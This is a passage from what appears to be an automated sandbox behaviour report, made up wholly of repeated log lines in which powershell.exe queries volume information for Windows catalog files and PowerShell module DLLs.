Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
